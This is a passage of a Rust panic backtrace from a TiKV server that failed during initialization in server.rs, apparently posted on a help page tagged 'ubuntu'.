core::result::Result<T,E>::expect\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/core/src/result.rs:1022:23\n      server::server::TiKvServer<ER>::init\n             at /opt/tikv/components/server/src/server.rs:269:25\n   8: server::server::run_impl\n             at /opt/tikv/components/server/src/server.rs:116:20\n      server::server::run_tikv\n             at /opt/tikv/components/server/src/server.rs:163:5\n   9: tikv_server::main\n             at /opt/tikv/cmd/tikv-server/src/main.rs:189:5\n  10: core::ops::function::FnOnce::call_once\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/core/src/ops/function.rs:227:5\n      std::sys_common::backtrace::__rust_begin_short_backtrace\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/std/src/sys_common/backtrace.rs:122:18\n  11: std::rt::lang_start::{{closure}}\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/std/src/rt.rs:145:18\n  12: core::ops::function::impls::<impl core::ops::function::FnOnce<A> for &F>::call_once\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/core/src/ops/function.rs:259:13\n      std::panicking::try::do_call\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/std/src/panicking.rs:492:40\n      std::panicking::try\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/std/src/panicking.rs:456:19\n      std::panic::catch_unwind\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/std/src/panic.rs:137:14\n      std::rt::lang_start_internal::{{closure}}\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/std/src/rt.rs:128:48\n      std::panicking::try::do_call\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/std/src/panicking.rs:492:40\n      std::panicking::try\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/std/src/panicking.rs:456:19\n      std::panic::catch_unwind\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/std/src/panic.rs:137:14\n      std::rt::lang_start_internal\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/std/src/rt.rs:128:20\n  13: main\n  14: __libc_start_main\n             at /build/glibc-6iIyft/glibc-2.28/csu/../csu/libc-start.c:308:16\n  15: _start\n"] [location=components/server/src/server.rs:269] [thread_name=main]

Tag

#ubuntu